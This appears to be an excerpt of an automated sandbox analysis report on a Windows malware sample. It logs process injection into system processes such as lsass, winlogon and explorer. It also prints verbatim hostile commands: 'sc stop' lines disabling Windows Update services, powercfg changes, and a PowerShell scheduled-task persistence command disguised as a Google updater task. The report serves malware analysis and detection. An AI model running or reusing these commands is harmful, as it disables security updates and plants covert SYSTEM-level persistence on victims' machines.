Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C8B4690000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 213C6680000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: B80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25B905C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2905A8E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A5FA180000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19296180000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24ED0990000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20955360000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B054660000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15D00D80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20983090000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 278CACC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DAE2270000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 284FF340000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 226857D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B661F20000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD637D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: B10000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2081CC80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23263180000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2064B670000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1F535400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 149A8F80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 184A3070000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 2A1E49D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CAA8EE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 250CD600000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1FCC4AD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBCF810000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22CC5DD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBDB990000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 1C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1757EE20000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 22657CE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 251EBAA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 23C4A170000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sc.exe base: 1B9A06B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 23138F50000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\powercfg.exe base: 159F60D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 22FD9460000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\powercfg.exe base: 27A23430000 value starts with: 4D5A	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 3968 base: B10000 value: 4D

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Thread register set: target process: 2788	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 5288
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 5212
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 6792

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Memory written: C:\Windows\System32\dialer.exe base: 6946F8B010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 161C7340000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 233B91B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 210918F0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2062E960000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 282B8D70000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22856DC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 207BAC00000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27A01800000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2992B230000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23227590000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28098F60000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23ACD780000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F1C1330000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 192A4090000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5112C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2848B1D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A12F60000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D8115C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C8B4690000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 213C6680000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: B80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25B905C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2905A8E0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A5FA180000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19296180000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24ED0990000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20955360000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B054660000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15D00D80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20983090000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 278CACC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DAE2270000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 284FF340000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 226857D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B661F20000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD637D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: B10000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2081CC80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23263180000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2064B670000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1F535400000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 149A8F80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 184A3070000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\Runtimeuserer.exe base: 2A1E49D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CAA8EE0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 250CD600000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1FCC4AD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBCF810000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22CC5DD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBDB990000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 1C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1757EE20000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 22657CE0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 251EBAA0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 23C4A170000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sc.exe base: 1B9A06B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 23138F50000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\powercfg.exe base: 159F60D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 22FD9460000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\powercfg.exe base: 27A23430000	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 66054B6010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 18133DC010
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 3638BCA010

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Process created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#irktvxcx#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#irktvxcx#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }			Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 22_2_00007FF723DE1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

22_2_00007FF723DE1C64

Source: C:\Windows\System32\dialer.exe

Code function: 22_2_00007FF723DE1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

22_2_00007FF723DE1C64

Source: dwm.exe, 00000020.00000002.2703716439.000002108F7C5000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000020.00000000.1725597176.000002108F7C5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 0000001B.00000000.1699179617.000001FC60840000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001B.00000002.2675520896.000001FC60841000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000020.00000002.2695293567.000002108AD71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 0000001B.00000000.1699179617.000001FC60840000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001B.00000002.2675520896.000001FC60841000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000020.00000002.2695293567.000002108AD71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 0000001B.00000000.1699179617.000001FC60840000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001B.00000002.2675520896.000001FC60841000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000020.00000002.2695293567.000002108AD71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: winlogon.exe, 0000001B.00000000.1699179617.000001FC60840000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001B.00000002.2675520896.000001FC60841000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000020.00000002.2695293567.000002108AD71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\winlogon.exe

Code function: 27_2_000001FC5FFA14A0 cpuid

27_2_000001FC5FFA14A0

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Queries volume information: C:\Users\user\Desktop\zufmUwylvo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
